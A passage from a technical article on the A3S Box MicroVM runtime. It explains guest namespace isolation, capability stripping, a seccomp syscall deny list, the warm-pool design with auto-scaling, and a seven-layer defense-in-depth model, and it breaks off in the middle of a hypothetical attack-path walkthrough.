&lt;p&gt;Inside the MicroVM, Guest Init starts the container process via &lt;code&gt;namespace::spawn_isolated()&lt;/code&gt;. Notably, namespace isolation inside the MicroVM is &lt;strong&gt;optional&lt;/strong&gt; — because the VM boundary itself already provides hardware-level isolation.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;NamespaceConfig&lt;/code&gt; defines seven namespace flags:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Namespace&lt;/th&gt;
&lt;th&gt;Function&lt;/th&gt;
&lt;th&gt;Enabled by Default&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Mount&lt;/td&gt;
&lt;td&gt;Filesystem isolation&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PID&lt;/td&gt;
&lt;td&gt;Process ID isolation&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPC&lt;/td&gt;
&lt;td&gt;Inter-process communication isolation&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UTS&lt;/td&gt;
&lt;td&gt;Hostname isolation&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Net&lt;/td&gt;
&lt;td&gt;Network isolation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User&lt;/td&gt;
&lt;td&gt;User ID isolation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cgroup&lt;/td&gt;
&lt;td&gt;cgroup isolation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Three preset configurations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;default()&lt;/code&gt;: Mount + PID + IPC + UTS (recommended)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;full_isolation()&lt;/code&gt;: All seven namespaces&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;minimal()&lt;/code&gt;: Mount + PID only&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  14.4 Security Policy Application
&lt;/h3&gt;

&lt;p&gt;Before &lt;code&gt;execvp()&lt;/code&gt;, Guest Init applies three layers of security policy:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 1: PR_SET_NO_NEW_PRIVS&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Using &lt;code&gt;prctl(PR_SET_NO_NEW_PRIVS, 1)&lt;/code&gt; ensures the process and its children cannot gain new privileges via &lt;code&gt;execve()&lt;/code&gt;. This prevents privilege escalation through SUID/SGID binaries.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 2: Capability Stripping&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Linux Capabilities split traditional root's full power into 41 fine-grained capabilities (from &lt;code&gt;CAP_CHOWN&lt;/code&gt;(0) to &lt;code&gt;CAP_CHECKPOINT_RESTORE&lt;/code&gt;(40)). Guest Init strips all Capabilities by default:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Strip all 41 Capabilities&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;cap&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="o"&gt;..=&lt;/span&gt;&lt;span class="mi"&gt;40&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nn"&gt;libc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;prctl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;libc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;PR_CAPBSET_DROP&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cap&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="c1"&gt;// Clear ambient and inheritable sets&lt;/span&gt;
&lt;span class="nn"&gt;libc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;prctl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;libc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;PR_CAP_AMBIENT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;libc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;PR_CAP_AMBIENT_CLEAR_ALL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Users can selectively add or remove specific Capabilities via &lt;code&gt;--cap-add&lt;/code&gt; and &lt;code&gt;--cap-drop&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 3: Seccomp BPF Filter&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Seccomp (Secure Computing Mode) filters syscalls through BPF (Berkeley Packet Filter) programs. A3S Box's default Seccomp policy blocks 16 dangerous syscalls:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Syscall&lt;/th&gt;
&lt;th&gt;Reason for Blocking&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;kexec_load&lt;/code&gt; / &lt;code&gt;kexec_file_load&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Prevent loading a new kernel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;reboot&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent system reboot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;swapon&lt;/code&gt; / &lt;code&gt;swapoff&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Prevent swap space manipulation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;init_module&lt;/code&gt; / &lt;code&gt;finit_module&lt;/code&gt; / &lt;code&gt;delete_module&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Prevent loading/unloading kernel modules&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;acct&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent enabling process accounting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;settimeofday&lt;/code&gt; / &lt;code&gt;clock_settime&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Prevent modifying system time&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;personality&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent changing execution domain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;keyctl&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent manipulating kernel keyring&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;perf_event_open&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent performance monitoring (side-channel risk)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;bpf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent loading BPF programs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;userfaultfd&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent userspace page fault handling (exploitation risk)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The Seccomp filter also includes architecture validation: only allows syscalls for x86_64 (&lt;code&gt;0xC000_003E&lt;/code&gt;) or aarch64 (&lt;code&gt;0xC000_00B7&lt;/code&gt;) architectures, preventing bypass via 32-bit compatibility mode.&lt;/p&gt;

&lt;h3&gt;
  
  
  14.5 Graceful Shutdown
&lt;/h3&gt;

&lt;p&gt;When receiving a SIGTERM signal, Guest Init executes a graceful shutdown flow:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Set the &lt;code&gt;SHUTDOWN_REQUESTED&lt;/code&gt; flag&lt;/li&gt;
&lt;li&gt;Forward SIGTERM to all child processes&lt;/li&gt;
&lt;li&gt;Wait for child processes to exit (timeout &lt;code&gt;CHILD_SHUTDOWN_TIMEOUT_MS = 5000ms&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Send SIGKILL to any still-alive child processes after timeout&lt;/li&gt;
&lt;li&gt;Call &lt;code&gt;libc::sync()&lt;/code&gt; to flush filesystem buffers&lt;/li&gt;
&lt;li&gt;Exit with the container process's exit code (&lt;code&gt;128 + signal&lt;/code&gt; for signal termination)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This two-phase shutdown ensures applications have the opportunity to perform cleanup operations (such as closing database connections, flushing logs), while guaranteeing the shutdown process doesn't hang indefinitely.&lt;/p&gt;




&lt;h2&gt;
  
  
  15. Warm Pool: The Ultimate Solution to Cold Starts
&lt;/h2&gt;

&lt;h3&gt;
  
  
  15.1 The Nature of the Cold Start Problem
&lt;/h3&gt;

&lt;p&gt;Even though A3S Box has optimized MicroVM cold start time to approximately 200ms, in some scenarios this is still not enough:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Real-time API services&lt;/strong&gt;: P99 latency requirement &amp;lt; 100ms; a 200ms cold start would cause first-request timeouts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Interactive AI Agents&lt;/strong&gt;: Users expect instant responses; any perceptible delay degrades experience&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Burst traffic&lt;/strong&gt;: Large numbers of requests arriving in a short time; serial VM startup causes request backlog&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The Warm Pool solves this by pre-starting a batch of MicroVMs — when a request arrives, a ready VM is directly allocated, achieving near-zero latency response.&lt;/p&gt;

&lt;h3&gt;
  
  
  15.2 Warm Pool Architecture
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;                    +-----------------------------+
                    |         WarmPool             |
                    |                              |
  acquire() ------&amp;gt; |  +-----+ +-----+ +-----+   |
  (get VM)          |  | VM1 | | VM2 | | VM3 |   | &amp;lt;- Idle VM queue
                    |  |Ready| |Ready| |Ready|   |
  release() ------&amp;gt; |  +-----+ +-----+ +-----+   |
  (return VM)       |                              |
                    |  +----------------------+    |
                    |  |  Background Task      |    |
                    |  |  - Evict expired VMs  |    |
                    |  |  - Replenish min_idle  |    |
                    |  |  - Auto-scaling        |    |
                    |  +----------------------+    |
                    |                              |
                    |  +----------------------+    |
                    |  |  PoolScaler           |    |
                    |  |  - Sliding window stats|    |
                    |  |  - Dynamic min_idle    |    |
                    |  +----------------------+    |
                    +-----------------------------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  15.3 Core Configuration
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;PoolConfig&lt;/code&gt; defines the warm pool's behavioral parameters:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;PoolConfig&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;enabled&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;          &lt;span class="c1"&gt;// Default false&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;min_idle&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;usize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// Minimum idle VM count, default 1&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_size&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;usize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// Maximum VM count in pool, default 5&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;idle_ttl_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;     &lt;span class="c1"&gt;// Idle VM time-to-live, default 300 seconds&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;Tuning Advice&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;min_idle&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Set based on average concurrency; too high wastes resources&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;max_size&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Set based on host memory; each VM ~512 MiB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;idle_ttl_secs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;300&lt;/td&gt;
&lt;td&gt;Shorten for sparse traffic to save resources&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  15.4 Acquire and Release
&lt;/h3&gt;

&lt;p&gt;The core operations of the warm pool are &lt;code&gt;acquire()&lt;/code&gt; and &lt;code&gt;release()&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;acquire() (get VM)&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Try to pop a Ready-state VM from the idle queue&lt;/li&gt;
&lt;li&gt;If hit, record hit statistics and return directly&lt;/li&gt;
&lt;li&gt;If miss, record miss statistics and start a new VM on demand (slow path)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;release() (return VM)&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Check if the pool is full (current count &amp;gt;= max_size)&lt;/li&gt;
&lt;li&gt;Not full: put VM back in idle queue, reset creation time&lt;/li&gt;
&lt;li&gt;Full: destroy VM&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Hit/miss statistics are the key input for auto-scaling.&lt;/p&gt;

&lt;h3&gt;
  
  
  15.5 Auto-Scaling
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;PoolScaler&lt;/code&gt; dynamically adjusts &lt;code&gt;min_idle&lt;/code&gt; based on hit rate within a sliding window, implementing adaptive resource management:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ScalingPolicy&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;enabled&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;scale_up_threshold&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;f64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// Default 0.3 (30% miss rate triggers scale-up)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;scale_down_threshold&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;f64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// Default 0.05 (5% miss rate triggers scale-down)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_min_idle&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;usize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// Upper limit for min_idle&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;cooldown_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;         &lt;span class="c1"&gt;// Cooldown period, default 60 seconds&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;window_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Statistics window, default 120 seconds&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Scaling decision logic:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Calculate miss rate in sliding window = miss_count / (hit_count + miss_count)

If miss rate &amp;gt; scale_up_threshold (0.3):
    effective_min_idle += 1  (not exceeding max_min_idle)
    Enter cooldown period

If miss rate &amp;lt; scale_down_threshold (0.05):
    effective_min_idle -= 1  (not below configured min_idle)
    Enter cooldown period
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The cooldown period (default 60 seconds) prevents frequent adjustments during traffic fluctuations, avoiding "oscillation."&lt;/p&gt;

&lt;h3&gt;
  
  
  15.6 Background Maintenance
&lt;/h3&gt;

&lt;p&gt;The warm pool starts a background async task that performs maintenance at &lt;code&gt;max(idle_ttl / 5, 5s)&lt;/code&gt; intervals:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Evaluate auto-scaling&lt;/strong&gt;: Call &lt;code&gt;PoolScaler&lt;/code&gt; to calculate new &lt;code&gt;effective_min_idle&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Evict expired VMs&lt;/strong&gt;: Check each idle VM's lifetime; destroy those exceeding &lt;code&gt;idle_ttl_secs&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Replenish VMs&lt;/strong&gt;: If idle VM count is below &lt;code&gt;effective_min_idle&lt;/code&gt;, start new VMs to replenish&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  15.7 Event Tracking
&lt;/h3&gt;

&lt;p&gt;All key warm pool operations emit events for monitoring and debugging:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Trigger&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.vm.acquired&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;VM acquired&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.vm.released&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;VM returned&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.vm.created&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;New VM created&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.vm.evicted&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;VM evicted due to expiry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.replenish&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;VM replenishment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.autoscale&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Auto-scaling triggered&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.drained&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pool drained (on shutdown)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  15.8 Graceful Drain
&lt;/h3&gt;

&lt;p&gt;When the system shuts down, the &lt;code&gt;drain()&lt;/code&gt; method performs a graceful drain:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Send shutdown signal to background maintenance task&lt;/li&gt;
&lt;li&gt;Wait for background task to complete&lt;/li&gt;
&lt;li&gt;Destroy all idle VMs&lt;/li&gt;
&lt;li&gt;Emit &lt;code&gt;pool.drained&lt;/code&gt; event&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This ensures no orphan VM processes are left behind when the system shuts down.&lt;/p&gt;




&lt;h2&gt;
  
  
  16. Seven-Layer Defense-in-Depth Security Model
&lt;/h2&gt;

&lt;h3&gt;
  
  
  16.1 The Philosophy of Defense in Depth
&lt;/h3&gt;

&lt;p&gt;There is a fundamental principle in security: &lt;strong&gt;no single security measure is perfect&lt;/strong&gt;. Whether encryption algorithms, access controls, or hardware isolation, all may have unknown vulnerabilities. The Defense in Depth strategy stacks multiple independent security mechanisms so that an attacker must simultaneously breach all layers to achieve their goal.&lt;/p&gt;

&lt;p&gt;A3S Box implements seven layers of defense in depth, with each layer independently increasing the cost of attack:&lt;/p&gt;

&lt;h3&gt;
  
  
  16.2 Layer 1: Hardware Virtualization Isolation
&lt;/h3&gt;

&lt;p&gt;This is the outermost and strongest isolation. Each MicroVM runs in an independent hardware virtualization domain (Intel VT-x / AMD-V / Apple HVF). The processor distinguishes between host mode and guest mode at the hardware level, and any sensitive operation triggers a VM Exit.&lt;/p&gt;

&lt;p&gt;Even if an attacker gains root privileges inside a MicroVM and exploits a Linux kernel vulnerability, they can only affect that MicroVM itself — because kernel vulnerabilities cannot break through the hardware virtualization boundary.&lt;/p&gt;

&lt;h3&gt;
  
  
  16.3 Layer 2: Memory Encryption (TEE)
&lt;/h3&gt;

&lt;p&gt;On hardware supporting AMD SEV-SNP or Intel TDX, the MicroVM's memory is hardware-encrypted. Each VM has an independent AES encryption key managed by the processor's security processor. Even if an attacker has physical access to the host (including cold boot attacks, DMA attacks), they cannot read the plaintext of VM memory.&lt;/p&gt;

&lt;p&gt;This layer extends the threat model from "trust the host" to "trust no one" — only trust the hardware.&lt;/p&gt;

&lt;h3&gt;
  
  
  16.4 Layer 3: Independent Kernel
&lt;/h3&gt;

&lt;p&gt;Each MicroVM runs its own Linux kernel. This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A kernel vulnerability in one MicroVM does not affect other MicroVMs&lt;/li&gt;
&lt;li&gt;Kernel configuration can be optimized for the workload (minimizing attack surface)&lt;/li&gt;
&lt;li&gt;Kernel versions can be updated independently without affecting other workloads&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  16.5 Layer 4: Namespace Isolation
&lt;/h3&gt;

&lt;p&gt;Inside the MicroVM, container processes are further isolated through Linux namespaces. Mount, PID, IPC, and UTS namespaces are enabled by default. The significance of this layer is: even if multiple processes run inside the MicroVM, they have OS-level isolation between them.&lt;/p&gt;

&lt;h3&gt;
  
  
  16.6 Layer 5: Capability Stripping
&lt;/h3&gt;

&lt;p&gt;The Linux Capability mechanism splits root's full power into 41 fine-grained capabilities. A3S Box strips all Capabilities by default, retaining only those explicitly needed by the application. This follows the principle of least privilege — processes only have the minimum set of permissions needed to complete their tasks.&lt;/p&gt;

&lt;h3&gt;
  
  
  16.7 Layer 6: Seccomp BPF Syscall Filtering
&lt;/h3&gt;

&lt;p&gt;Even if a process has certain Capabilities, the Seccomp BPF filter can still block specific syscalls. A3S Box blocks 16 dangerous syscalls by default (such as &lt;code&gt;kexec_load&lt;/code&gt;, &lt;code&gt;bpf&lt;/code&gt;, &lt;code&gt;perf_event_open&lt;/code&gt;), and validates the syscall architecture (preventing bypass via 32-bit compatibility mode).&lt;/p&gt;

&lt;h3&gt;
  
  
  16.8 Layer 7: no-new-privileges
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;PR_SET_NO_NEW_PRIVS&lt;/code&gt; flag ensures the process and all its descendants cannot gain new privileges via &lt;code&gt;execve()&lt;/code&gt;. This prevents attack paths that escalate privileges by executing SUID/SGID binaries.&lt;/p&gt;

&lt;h3&gt;
  
  
  16.9 Security Configuration Propagation
&lt;/h3&gt;

&lt;p&gt;Security configuration is passed from the host to Guest Init via a set of environment variables:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Environment Variable&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_SEC_SECCOMP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Seccomp mode&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;default&lt;/code&gt; / &lt;code&gt;unconfined&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_SEC_NO_NEW_PRIVS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no-new-privileges&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;1&lt;/code&gt; / &lt;code&gt;0&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_SEC_PRIVILEGED&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Privileged mode&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;1&lt;/code&gt; / &lt;code&gt;0&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_SEC_CAP_ADD&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Added Capabilities&lt;/td&gt;
&lt;td&gt;&lt;code&gt;NET_ADMIN,SYS_TIME&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_SEC_CAP_DROP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Removed Capabilities&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ALL&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Privileged mode (&lt;code&gt;--privileged&lt;/code&gt;) simultaneously sets &lt;code&gt;seccomp=unconfined&lt;/code&gt;, &lt;code&gt;no_new_privileges=false&lt;/code&gt;, &lt;code&gt;cap_add=ALL&lt;/code&gt; — this should only be used during development and debugging; strongly not recommended in production.&lt;/p&gt;

&lt;h3&gt;
  
  
  16.10 Attack Path Analysis
&lt;/h3&gt;

&lt;p&gt;Let's analyze a hypothetical attack scenario to see how the seven layers work together:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Attacker goal: Read MicroVM B's memory data from MicroVM A

Step 1: Attacker gains application-level code execution in MicroVM A
        -&amp;gt; Faces Layer 7 (no-new-privileges): cannot escalate privileges
        -&amp;gt; Faces Layer 6 (Seccomp): dangerous syscalls blocked
        -&amp;gt; Faces Layer 5 (Capabilities): lacks necessary capabilities

Step 2: Assume attacker bypasses application-layer defenses, gains root
        -&amp;gt; Faces Layer 4 (Namespace): can only see own processes and filesystem
        -&amp;gt; Faces Layer 3 (Independent kernel): kernel vulnerabilities only affect own VM

